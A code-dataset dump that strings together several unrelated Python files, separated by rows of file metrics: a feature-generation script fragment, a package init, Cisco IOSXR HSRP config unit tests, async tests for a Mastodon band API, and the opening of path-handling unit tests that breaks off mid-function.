if ngram == 2:
# since product_name is of length 2, it makes no difference
# for various aggregation as there is only one item
param_list = [ngram, "mean"]
else:
param_list = [ngram, aggregation_mode]
pf = PairwiseFeatureWrapper(generator, dfAll, obs_fields, target_fields, param_list, config.FEAT_DIR, logger)
pf.go()
if __name__ == "__main__":
main(sys.argv[1])
| 42.323263
| 158
| 0.633093
| 1,728
| 14,009
| 4.770833
| 0.109954
| 0.042576
| 0.051553
| 0.037361
| 0.835517
| 0.81902
| 0.790636
| 0.784935
| 0.784935
| 0.778991
| 0
| 0.009805
| 0.242844
| 14,009
| 330
| 159
| 42.451515
| 0.767418
| 0.101506
| 0
| 0.729084
| 0
| 0
| 0.053413
| 0.019321
| 0
| 0
| 0
| 0
| 0
| 1
| 0.091633
| false
| 0
| 0.035857
| 0.011952
| 0.215139
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2aa20c6134f359ecbf6d2a9489ba36bf173e8e39
| 89
|
py
|
Python
|
torch_rl/torch_rl/utils/__init__.py
|
maximilianigl/rl-iter
|
73301871edfb5b513b2dbdac78a5817db97e8c7b
|
[
"MIT"
] | 10
|
2020-06-07T23:04:07.000Z
|
2021-12-03T07:11:34.000Z
|
torch_rl/torch_rl/utils/__init__.py
|
maximilianigl/rl-iter
|
73301871edfb5b513b2dbdac78a5817db97e8c7b
|
[
"MIT"
] | null | null | null |
torch_rl/torch_rl/utils/__init__.py
|
maximilianigl/rl-iter
|
73301871edfb5b513b2dbdac78a5817db97e8c7b
|
[
"MIT"
] | 1
|
2020-06-26T06:41:40.000Z
|
2020-06-26T06:41:40.000Z
|
from torch_rl.utils.dictlist import DictList
from torch_rl.utils.penv import ParallelEnv
| 29.666667
| 44
| 0.865169
| 14
| 89
| 5.357143
| 0.571429
| 0.24
| 0.293333
| 0.426667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089888
| 89
| 2
| 45
| 44.5
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2ab8ecb542794cad1b4022f449e05abdd80fc8de
| 16,101
|
py
|
Python
|
pkgs/conf-pkg/src/genie/libs/conf/hsrp/iosxr/tests/test_hsrp.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | null | null | null |
pkgs/conf-pkg/src/genie/libs/conf/hsrp/iosxr/tests/test_hsrp.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | null | null | null |
pkgs/conf-pkg/src/genie/libs/conf/hsrp/iosxr/tests/test_hsrp.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
'''
IOSXR unit tests for Genie Hsrp conf.
'''
# Python
import re
import unittest
from unittest.mock import Mock
# Genie
from genie.conf import Genie
from genie.conf.tests import TestCase
from genie.conf.base import Testbed, Device
from genie.libs.conf.hsrp.hsrp import Hsrp
from genie.libs.conf.interface import Interface
class test_hsrp_old(TestCase):
def setUp(self):
# Set Genie Tb
testbed = Testbed()
Genie.testbed = testbed
# Device
self.dev1 = Device(name='PE1', testbed=testbed, os='iosxr')
# Interface
self.intf1 = Interface(name='GigabitEthernet0/0/0/1', device=self.dev1)
self.intf1.shutdown = False
# Hsrp object
self.hsrp1 = Hsrp()
# Build config
cfgs = self.intf1.build_config(apply=False)
# Check config built correctly
self.assertMultiLineEqual(
str(cfgs),
'\n'.join([
'interface GigabitEthernet0/0/0/1',
' no shutdown',
' exit',
]))
def test_cli_config1(self):
# Apply configuration
key = self.hsrp1.device_attr[self.dev1].interface_attr[self.intf1]
key.bfd_min_interval = 30
key.bfd_multiplier = 50
key.minimum_delay = 5
key.reload_delay = 10
key.mac_refresh = 20
key.use_bia = True
key.redirect = True
key.address_family = 'ipv4'
key.version = 2
key.group_number = 30
key.ip_address = '192.168.1.254'
key.authentication_word = 'cisco123'
key.bfd_fast_detect = True
key.mac_address = 'dead.beef.dead'
key.group_name = 'gandalf'
key.preempt = True
key.preempt_minimum_delay = 5
key.priority = 110
key.hello_interval_seconds = 1
key.holdtime_seconds = 3
key.track_object = 1
key.priority_decrement = 20
# Build config
cfgs = self.hsrp1.build_config(apply=False)
# Check config built correctly
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'router hsrp',
'interface GigabitEthernet0/0/0/1',
' hsrp bfd minimum-interval 30',
' hsrp bfd multiplier 50',
' hsrp delay minimum 5 reload 10',
' hsrp use-bia',
' hsrp redirect disable',
' hsrp mac-refresh 20',
' address-family ipv4',
' hsrp version 2',
' hsrp 30',
' address 192.168.1.254',
' authentication cisco123',
' bfd fast-detect',
' mac-address dead.beef.dead',
' name gandalf',
' preempt delay 5',
' priority 110',
' timers 1 3',
' track object 1 20',
' exit',
' exit',
' exit',
]))
# Build unconfig
cfgs = self.hsrp1.build_unconfig(apply=False)
# Check config correctly unconfigured
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'no router hsrp',
'interface GigabitEthernet0/0/0/1',
' no hsrp bfd minimum-interval 30',
' no hsrp bfd multiplier 50',
' no hsrp delay minimum 5 reload 10',
' no hsrp use-bia',
' no hsrp redirect disable',
' no hsrp mac-refresh 20',
' no address-family ipv4',
' exit',
]))
def test_cli_config2(self):
# Apply configuration
key = self.hsrp1.device_attr[self.dev1].interface_attr[self.intf1]
key.address_family = 'ipv6'
key.group_number = 5
key.priority = 110
key.preempt = True
key.hello_interval_msec = 300
key.holdtime_msec = 500
# Build config
cfgs = self.hsrp1.build_config(apply=False)
# Check config built correctly
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'router hsrp',
'interface GigabitEthernet0/0/0/1',
' address-family ipv6',
' hsrp 5',
' preempt',
' priority 110',
' timers msec 300 msec 500',
' exit',
' exit',
' exit',
]))
# Build unconfig
cfgs = self.hsrp1.build_unconfig(apply=False)
# Check config correctly unconfigured
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'no router hsrp',
'interface GigabitEthernet0/0/0/1',
' no address-family ipv6',
' exit',
]))
def test_cli_config_args(self):
# create Hsrp conf by taking args
hsrp1 = Hsrp(group_number=5, address_family = 'ipv6')
# Apply configuration
key = hsrp1.device_attr[self.dev1].interface_attr[self.intf1]
key.priority = 110
key.preempt = True
key.hello_interval_msec = 300
key.holdtime_msec = 500
# Build config
cfgs = hsrp1.build_config(apply=False)
# Check config built correctly
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'router hsrp',
'interface GigabitEthernet0/0/0/1',
' address-family ipv6',
' hsrp 5',
' preempt',
' priority 110',
' timers msec 300 msec 500',
' exit',
' exit',
' exit',
]))
# Build unconfig
cfgs = hsrp1.build_unconfig(apply=False)
# Check config correctly unconfigured
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'no router hsrp',
'interface GigabitEthernet0/0/0/1',
' no address-family ipv6',
' exit',
]))
# create Ipv4 Hsrp conf by taking args
hsrp2 = Hsrp(group_number=5)
# Apply configuration
key = hsrp2.device_attr[self.dev1].interface_attr[self.intf1]
key.priority = 110
key.preempt = True
key.hello_interval_msec = 300
key.holdtime_msec = 500
# Build config
cfgs = hsrp2.build_config(apply=False)
# Check config built correctly
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'router hsrp',
'interface GigabitEthernet0/0/0/1',
' address-family ipv4',
' hsrp 5',
' preempt',
' priority 110',
' timers msec 300 msec 500',
' exit',
' exit',
' exit',
]))
# Build unconfig
cfgs = hsrp2.build_unconfig(apply=False)
# Check config correctly unconfigured
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'no router hsrp',
'interface GigabitEthernet0/0/0/1',
' no address-family ipv4',
' exit',
]))
class test_hsrp(TestCase):
def setUp(self):
# Set Genie Tb
testbed = Testbed()
Genie.testbed = testbed
# Device
self.dev1 = Device(name='PE1', testbed=testbed, os='iosxr')
# Interface
self.intf1 = Interface(name='GigabitEthernet0/0/0/1', device=self.dev1)
self.intf1.shutdown = False
# Hsrp object
self.hsrp1 = Hsrp()
# Build config
cfgs = self.intf1.build_config(apply=False)
# Check config built correctly
self.assertMultiLineEqual(
str(cfgs),
'\n'.join([
'interface GigabitEthernet0/0/0/1',
' no shutdown',
' exit',
]))
def test_cli_config1(self):
# Apply configuration
key = self.hsrp1.device_attr[self.dev1].interface_attr[self.intf1]
key.bfd_interval = 30
key.bfd_detection_multiplier = 50
key.bfd_address = '192.168.1.2'
key.bfd_interface_name = 'GigabitEthernet0/0/0/1'
key.minimum_delay = 5
key.reload_delay = 10
key.mac_refresh = 20
key.use_bia = True
key.redirects_disable = True
key.address_family = 'ipv4'
key.version = 2
key.group_number = 30
key.primary_ipv4_address = '192.168.1.254'
key.secondary_ipv4_address = '192.168.1.253'
key.authentication = 'cisco123'
key.bfd_enabled = True
key.virtual_mac_address = 'dead.beef.dead'
key.session_name = 'gandalf'
key.preempt = True
key.priority = 110
key.hello_sec = 1
key.hold_sec = 3
key.tracked_object = 1
key.tracked_object_priority_decrement = 20
key.state_change_disable = True
# Build config
cfgs = self.hsrp1.build_config(apply=False)
# Check config built correctly
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'router hsrp',
'message state disable',
'interface GigabitEthernet0/0/0/1',
' hsrp bfd minimum-interval 30',
' hsrp bfd multiplier 50',
' hsrp delay minimum 5 reload 10',
' hsrp use-bia',
' hsrp redirect disable',
' hsrp mac-refresh 20',
' address-family ipv4',
' hsrp version 2',
' hsrp bfd fast-detect peer 192.168.1.2 GigabitEthernet0/0/0/1',
' hsrp 30',
' address 192.168.1.254',
' address 192.168.1.253 secondary',
' authentication cisco123',
' bfd fast-detect',
' mac-address dead.beef.dead',
' name gandalf',
' preempt',
' priority 110',
' timers 1 3',
' track object 1 20',
' exit',
' exit',
' exit',
]))
# Build unconfig
cfgs = self.hsrp1.build_unconfig(apply=False)
# Check config correctly unconfigured
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'no router hsrp',
'no message state disable',
'interface GigabitEthernet0/0/0/1',
' no hsrp bfd minimum-interval 30',
' no hsrp bfd multiplier 50',
' no hsrp delay minimum 5 reload 10',
' no hsrp use-bia',
' no hsrp redirect disable',
' no hsrp mac-refresh 20',
' no address-family ipv4',
' exit',
]))
def test_cli_config2(self):
# Apply configuration
key = self.hsrp1.device_attr[self.dev1].interface_attr[self.intf1]
key.address_family = 'ipv6'
key.global_ipv6_address = '2001:db8:1:1::254/64'
key.link_local_ipv6_address = 'fe80::205:73ff:fea0:19'
key.group_number = 5
key.priority = 110
key.preempt = True
key.hello_msec_flag = True
key.hello_msec = 300
key.hold_msec_flag = True
key.hold_msec = 500
key.tracked_interface = 'GigabitEthernet0/0/0/0'
key.tracked_intf_priority_decrement = 20
# Build config
cfgs = self.hsrp1.build_config(apply=False)
# Check config built correctly
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'router hsrp',
'interface GigabitEthernet0/0/0/1',
' address-family ipv6',
' hsrp 5',
' address global 2001:db8:1:1::254/64',
' address linklocal fe80::205:73ff:fea0:19',
' preempt',
' priority 110',
' timers msec 300 msec 500',
' track GigabitEthernet0/0/0/0 20',
' exit',
' exit',
' exit',
]))
# Build unconfig
cfgs = self.hsrp1.build_unconfig(apply=False)
# Check config correctly unconfigured
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'no router hsrp',
'interface GigabitEthernet0/0/0/1',
' no address-family ipv6',
' exit',
]))
def test_cli_config_args(self):
# create Hsrp conf by taking args
hsrp1 = Hsrp(group_number=5, address_family = 'ipv6')
# Apply configuration
key = hsrp1.device_attr[self.dev1].interface_attr[self.intf1]
key.hsrp_linklocal = 'auto'
key.priority = 110
key.preempt = True
key.virtual_ip_learn = True
key.hello_msec_flag = True
key.hello_msec = 300
key.hold_msec_flag = True
key.hold_msec = 500
# Build config
cfgs = hsrp1.build_config(apply=False)
# Check config built correctly
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'router hsrp',
'interface GigabitEthernet0/0/0/1',
' address-family ipv6',
' hsrp 5',
' address learn',
' address linklocal autoconfig',
' preempt',
' priority 110',
' timers msec 300 msec 500',
' exit',
' exit',
' exit',
]))
# Build unconfig
cfgs = hsrp1.build_unconfig(apply=False)
# Check config correctly unconfigured
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'no router hsrp',
'interface GigabitEthernet0/0/0/1',
' no address-family ipv6',
' exit',
]))
# create Ipv4 Hsrp conf by taking args
hsrp2 = Hsrp(group_number=5)
# Apply configuration
key = hsrp2.device_attr[self.dev1].interface_attr[self.intf1]
key.priority = 110
key.preempt = True
key.hello_msec_flag = True
key.hello_msec = 400
key.hold_msec_flag = True
key.hold_msec = 500
key.follow = 'group10'
# Build config
cfgs = hsrp2.build_config(apply=False)
# Check config built correctly
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'router hsrp',
'interface GigabitEthernet0/0/0/1',
' address-family ipv4',
' hsrp 5',
' slave follow group10',
' preempt',
' priority 110',
' timers msec 400 msec 500',
' exit',
' exit',
' exit',
]))
# Build unconfig
cfgs = hsrp2.build_unconfig(apply=False)
# Check config correctly unconfigured
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'no router hsrp',
'interface GigabitEthernet0/0/0/1',
' no address-family ipv4',
' exit',
]))
if __name__ == '__main__':
unittest.main()
| 31.883168
| 81
| 0.501894
| 1,625
| 16,101
| 4.875077
| 0.097846
| 0.028276
| 0.054532
| 0.052764
| 0.872128
| 0.8513
| 0.825297
| 0.816082
| 0.806488
| 0.806488
| 0
| 0.058166
| 0.399913
| 16,101
| 504
| 82
| 31.946429
| 0.761747
| 0.07956
| 0
| 0.842784
| 0
| 0
| 0.226598
| 0.038772
| 0
| 0
| 0
| 0
| 0.046392
| 1
| 0.020619
| false
| 0
| 0.020619
| 0
| 0.046392
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2ada022ad9b6d2ebd85535e9634d96389fff6c3a
| 7,200
|
py
|
Python
|
tests/test_app.py
|
perylemke/mastodon-api
|
cca61597b40971a464649b65ebb52d8098bb4f9c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_app.py
|
perylemke/mastodon-api
|
cca61597b40971a464649b65ebb52d8098bb4f9c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_app.py
|
perylemke/mastodon-api
|
cca61597b40971a464649b65ebb52d8098bb4f9c
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from httpx import AsyncClient
from asyncio import get_event_loop
from mastodon_api.app import app
@pytest.fixture(scope="module")
async def async_client():
async with AsyncClient(app=app, base_url="http://test") as client:
yield client
@pytest.fixture(scope="module")
def event_loop():
loop = get_event_loop()
yield loop
# Albums
@pytest.mark.asyncio
async def test_get_albums_code(async_client: AsyncClient) -> None:
response = await async_client.get("/api/albums/")
assert response.status_code == 200
@pytest.mark.asyncio
async def test_get_albums_response_size(async_client: AsyncClient) -> None:
response = await async_client.get("/api/albums/")
assert len(response.json()) > 0
@pytest.mark.asyncio
async def test_get_albums_with_right_id_code(
async_client: AsyncClient
) -> None:
response = await async_client.get("/api/albums/1/")
assert response.status_code == 200
@pytest.mark.asyncio
async def test_get_albums_with_right_id_response(
async_client: AsyncClient
) -> None:
response = await async_client.get("/api/albums/1/")
assert response.json()['name'] == 'Remission'
@pytest.mark.asyncio
async def test_get_albums_with_wrong_id_code(
async_client: AsyncClient
) -> None:
response = await async_client.get("/api/albums/0/")
assert response.status_code == 422
@pytest.mark.asyncio
async def test_get_albums_with_wrong_id_response(
async_client: AsyncClient
) -> None:
response = await async_client.get("/api/albums/0/")
assert response.json() == {
'detail': [
{
'ctx': {'limit_value': 1},
'loc': ['path', 'id'],
'msg': 'ensure this value is greater than or equal to 1',
'type': 'value_error.number.not_ge'
}
]
}
@pytest.mark.asyncio
async def test_get_albums_by_valid_acronymous_code(
async_client: AsyncClient
) -> None:
response = await async_client.get("/api/albums/?name=The")
assert response.status_code == 200
@pytest.mark.asyncio
async def test_get_albums_by_valid_acronymous_response(
async_client: AsyncClient
) -> None:
response = await async_client.get("/api/albums/?name=The")
assert len(response.json()) > 1
@pytest.mark.asyncio
async def test_get_albums_by_invalid_name_code(
async_client: AsyncClient
) -> None:
response = await async_client.get(
"/api/albums/?name=Powerslave")
assert response.status_code == 404
@pytest.mark.asyncio
async def test_get_albums_by_invalid_name_response(
async_client: AsyncClient
) -> None:
response = await async_client.get(
"/api/albums/?name=Powerslave")
assert response.json() == {'detail': 'Album not found.'}
@pytest.mark.asyncio
async def test_get_albums_with_a_right_long_word_code(
async_client: AsyncClient
) -> None:
response = await async_client.get(
"/api/albums/?name=Crack the Skye")
assert response.status_code == 200
@pytest.mark.asyncio
async def test_get_albums_with_a_right_long_word_response(
async_client: AsyncClient
) -> None:
response = await async_client.get(
"/api/albums/?name=Crack the Skye")
assert len(response.json()) == 1
@pytest.mark.asyncio
async def test_get_albums_with_a_wrong_long_word_code(
async_client: AsyncClient
) -> None:
response = await async_client.get(
"/api/albums/?name=The Number of the Beast")
assert response.status_code == 404
@pytest.mark.asyncio
async def test_get_albums_with_a_wrong_long_word_response(
async_client: AsyncClient
) -> None:
response = await async_client.get(
"/api/albums/?name=The Number of the Beast")
assert response.json() == {'detail': 'Album not found.'}
# Members
@pytest.mark.asyncio
async def test_get_members_code(async_client: AsyncClient) -> None:
response = await async_client.get("/api/members/")
assert response.status_code == 200
@pytest.mark.asyncio
async def test_get_members_response_size(async_client: AsyncClient) -> None:
response = await async_client.get("/api/members/")
assert len(response.json()) > 0
@pytest.mark.asyncio
async def test_get_members_with_right_id_code(
async_client: AsyncClient
) -> None:
response = await async_client.get("/api/members/1/")
assert response.status_code == 200
@pytest.mark.asyncio
async def test_get_members_with_right_id_response(
async_client: AsyncClient
) -> None:
response = await async_client.get("/api/members/1/")
assert response.json()['name'] == 'Brent Hinds'
@pytest.mark.asyncio
async def test_get_members_with_wrong_id_code(
async_client: AsyncClient
) -> None:
response = await async_client.get("/api/members/0/")
assert response.status_code == 422
@pytest.mark.asyncio
async def test_get_members_with_wrong_id_response(
async_client: AsyncClient
) -> None:
response = await async_client.get("/api/members/0/")
assert response.json() == {
'detail': [
{
'ctx': {'limit_value': 1},
'loc': ['path', 'id'],
'msg': 'ensure this value is greater than or equal to 1',
'type': 'value_error.number.not_ge'
}
]
}
@pytest.mark.asyncio
async def test_get_members_by_valid_acronymous_code(
async_client: AsyncClient
) -> None:
response = await async_client.get("/api/members/?name=Bran")
assert response.status_code == 200
@pytest.mark.asyncio
async def test_get_members_by_valid_acronymous_response(
async_client: AsyncClient
) -> None:
response = await async_client.get("/api/members/?name=Bre")
assert len(response.json()) >= 1
@pytest.mark.asyncio
async def test_get_members_by_invalid_name_code(
async_client: AsyncClient
) -> None:
response = await async_client.get(
"/api/members/?name=Pery")
assert response.status_code == 404
@pytest.mark.asyncio
async def test_get_members_by_invalid_name_response(
async_client: AsyncClient
) -> None:
response = await async_client.get(
"/api/members/?name=Pery")
assert response.json() == {'detail': 'Member not found.'}
@pytest.mark.asyncio
async def test_get_members_with_a_right_long_word_code(
async_client: AsyncClient
) -> None:
response = await async_client.get(
"/api/members/?name=Brann Dailor")
assert response.status_code == 200
@pytest.mark.asyncio
async def test_get_members_with_a_right_long_word_response(
async_client: AsyncClient
) -> None:
response = await async_client.get(
"/api/members/?name=Brann Dailor")
assert len(response.json()) == 1
@pytest.mark.asyncio
async def test_get_members_with_a_wrong_long_word_code(
async_client: AsyncClient
) -> None:
response = await async_client.get(
"/api/members/?name=Bruce Dickinson")
assert response.status_code == 404
@pytest.mark.asyncio
async def test_get_members_with_a_wrong_long_word_response(
async_client: AsyncClient
) -> None:
response = await async_client.get(
"/api/members/?name=Bruce Dickinson")
assert response.json() == {'detail': 'Member not found.'}
| 26.966292
| 76
| 0.702639
| 955
| 7,200
| 5.027225
| 0.096335
| 0.130598
| 0.099146
| 0.128307
| 0.938138
| 0.934805
| 0.934805
| 0.918559
| 0.90252
| 0.899188
| 0
| 0.010188
| 0.182083
| 7,200
| 266
| 77
| 27.067669
| 0.80506
| 0.001944
| 0
| 0.742574
| 0
| 0
| 0.137547
| 0.058889
| 0
| 0
| 0
| 0
| 0.138614
| 1
| 0.004951
| false
| 0
| 0.019802
| 0
| 0.024752
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
630e9905188b627d6ed208690646fb00ca2b223e
| 38,667
|
py
|
Python
|
test/unit/test_path.py
|
jimporter/bfg9000
|
c206646ecfed0d1a510e993b93e6a15677f45a14
|
[
"BSD-3-Clause"
] | 72
|
2015-06-23T02:35:13.000Z
|
2021-12-08T01:47:40.000Z
|
test/unit/test_path.py
|
jimporter/bfg9000
|
c206646ecfed0d1a510e993b93e6a15677f45a14
|
[
"BSD-3-Clause"
] | 139
|
2015-03-01T18:48:17.000Z
|
2021-06-18T15:45:14.000Z
|
test/unit/test_path.py
|
jimporter/bfg9000
|
c206646ecfed0d1a510e993b93e6a15677f45a14
|
[
"BSD-3-Clause"
] | 19
|
2015-12-23T21:24:33.000Z
|
2022-01-06T04:04:41.000Z
|
import os
from collections import namedtuple
from contextlib import contextmanager
from unittest import mock
from . import *
from bfg9000 import path
from bfg9000.platforms import target
from bfg9000.safe_str import jbos
MockEnv = namedtuple('MockEnv', ['target_platform'])
path_variables = {
path.Root.srcdir: '$(srcdir)',
path.Root.builddir: None,
path.InstallRoot.prefix: '$(prefix)',
path.InstallRoot.bindir: '$(bindir)',
}
@contextmanager
def mock_filesystem(*, listdir=None, exists=None, isdir=None, islink=None):
def mock_listdir(path):
basename = os.path.basename(path)
if basename == 'dir':
return ['file2.txt', 'sub']
elif basename == 'sub':
return []
return ['file.cpp', 'dir']
def mock_exists(path, variables=None):
return True
def mock_isdir(path, variables=None):
return not path.basename().startswith('file')
def mock_islink(path, variables=None):
return False
with mock.patch('os.listdir', listdir or mock_listdir) as a, \
mock.patch('bfg9000.path.exists', exists or mock_exists) as b, \
mock.patch('bfg9000.path.isdir', isdir or mock_isdir) as c, \
mock.patch('bfg9000.path.islink', islink or mock_islink) as d: # noqa
yield a, b, c, d
class TestPath(PathTestCase):
def test_construct(self):
p = self.Path('foo/bar', path.Root.srcdir)
self.assertEqual(p.suffix, 'foo/bar')
self.assertEqual(p.root, path.Root.srcdir)
self.assertEqual(p.directory, False)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), False)
p = self.Path(r'foo\bar', path.Root.srcdir)
self.assertEqual(p.suffix, 'foo/bar')
self.assertEqual(p.root, path.Root.srcdir)
self.assertEqual(p.directory, False)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), False)
p = self.Path('foo/bar/../.', path.Root.srcdir)
self.assertEqual(p.suffix, 'foo')
self.assertEqual(p.root, path.Root.srcdir)
self.assertEqual(p.directory, True)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), False)
p = self.Path('foo/.././bar', path.Root.srcdir)
self.assertEqual(p.suffix, 'bar')
self.assertEqual(p.root, path.Root.srcdir)
self.assertEqual(p.directory, False)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), False)
self.assertRaises(ValueError, self.Path, '..', path.Root.srcdir)
self.assertRaises(ValueError, self.Path, 'foo/../..', path.Root.srcdir)
self.assertRaises(ValueError, self.Path, 'foo/../../bar',
path.Root.srcdir)
self.assertRaises(ValueError, self.Path, 'foo', None)
self.assertRaises(ValueError, self.Path, 'foo', 'root')
def test_construct_absolute(self):
p = self.Path('/foo/bar', path.Root.absolute)
self.assertEqual(p.suffix, '/foo/bar')
self.assertEqual(p.root, path.Root.absolute)
self.assertEqual(p.directory, False)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), False)
p = self.Path('/foo/bar', path.Root.srcdir)
self.assertEqual(p.suffix, '/foo/bar')
self.assertEqual(p.root, path.Root.absolute)
self.assertEqual(p.directory, False)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), False)
p = self.Path('C:/foo/bar', path.Root.srcdir)
self.assertEqual(p.suffix, 'C:/foo/bar')
self.assertEqual(p.root, path.Root.absolute)
self.assertEqual(p.directory, False)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), True)
p = self.Path(r'C:\foo\bar', path.Root.srcdir)
self.assertEqual(p.suffix, 'C:/foo/bar')
self.assertEqual(p.root, path.Root.absolute)
self.assertEqual(p.directory, False)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), True)
p = self.Path('//server/mount/foo/bar', path.Root.srcdir)
self.assertEqual(p.suffix, '//server/mount/foo/bar')
self.assertEqual(p.root, path.Root.absolute)
self.assertEqual(p.directory, False)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), True)
p = self.Path(r'\\server\mount\foo\bar', path.Root.srcdir)
self.assertEqual(p.suffix, '//server/mount/foo/bar')
self.assertEqual(p.root, path.Root.absolute)
self.assertEqual(p.directory, False)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), True)
self.assertRaises(ValueError, self.Path, 'foo/bar', path.Root.absolute)
self.assertRaises(ValueError, self.Path, 'c:foo')
def test_construct_directory(self):
p = self.Path('foo/bar/', path.Root.srcdir)
self.assertEqual(p.suffix, 'foo/bar')
self.assertEqual(p.root, path.Root.srcdir)
self.assertEqual(p.directory, True)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), False)
p = self.Path('foo\\bar\\', path.Root.srcdir)
self.assertEqual(p.suffix, 'foo/bar')
self.assertEqual(p.root, path.Root.srcdir)
self.assertEqual(p.directory, True)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), False)
p = self.Path('.', path.Root.srcdir)
self.assertEqual(p.suffix, '')
self.assertEqual(p.root, path.Root.srcdir)
self.assertEqual(p.directory, True)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), False)
p = self.Path('./', path.Root.srcdir)
self.assertEqual(p.suffix, '')
self.assertEqual(p.root, path.Root.srcdir)
self.assertEqual(p.directory, True)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), False)
p = self.Path('foo/../.', path.Root.srcdir)
self.assertEqual(p.suffix, '')
self.assertEqual(p.root, path.Root.srcdir)
self.assertEqual(p.directory, True)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), False)
p = self.Path('foo/bar', path.Root.srcdir, directory=True)
self.assertEqual(p.suffix, 'foo/bar')
self.assertEqual(p.root, path.Root.srcdir)
self.assertEqual(p.directory, True)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), False)
p = self.Path('/foo/bar/', path.Root.absolute)
self.assertEqual(p.suffix, '/foo/bar')
self.assertEqual(p.root, path.Root.absolute)
self.assertEqual(p.directory, True)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), False)
p = self.Path('/', path.Root.absolute)
self.assertEqual(p.suffix, '/')
self.assertEqual(p.root, path.Root.absolute)
self.assertEqual(p.directory, True)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), False)
p = self.Path('/.', path.Root.absolute)
self.assertEqual(p.suffix, '/')
self.assertEqual(p.root, path.Root.absolute)
self.assertEqual(p.directory, True)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), False)
p = self.Path('C:/', path.Root.srcdir)
self.assertEqual(p.suffix, 'C:/')
self.assertEqual(p.root, path.Root.absolute)
self.assertEqual(p.directory, True)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), True)
p = self.Path('C:/.', path.Root.srcdir)
self.assertEqual(p.suffix, 'C:/')
self.assertEqual(p.root, path.Root.absolute)
self.assertEqual(p.directory, True)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), True)
self.assertRaises(ValueError, self.Path, 'foo/', path.Root.srcdir,
directory=False)
def test_construct_destdir(self):
p = self.Path('foo/bar', path.InstallRoot.bindir, True)
self.assertEqual(p.suffix, 'foo/bar')
self.assertEqual(p.root, path.InstallRoot.bindir)
self.assertEqual(p.directory, False)
self.assertEqual(p.destdir, True)
self.assertEqual(p.has_drive(), False)
p = self.Path('/foo/bar', path.Root.absolute, True)
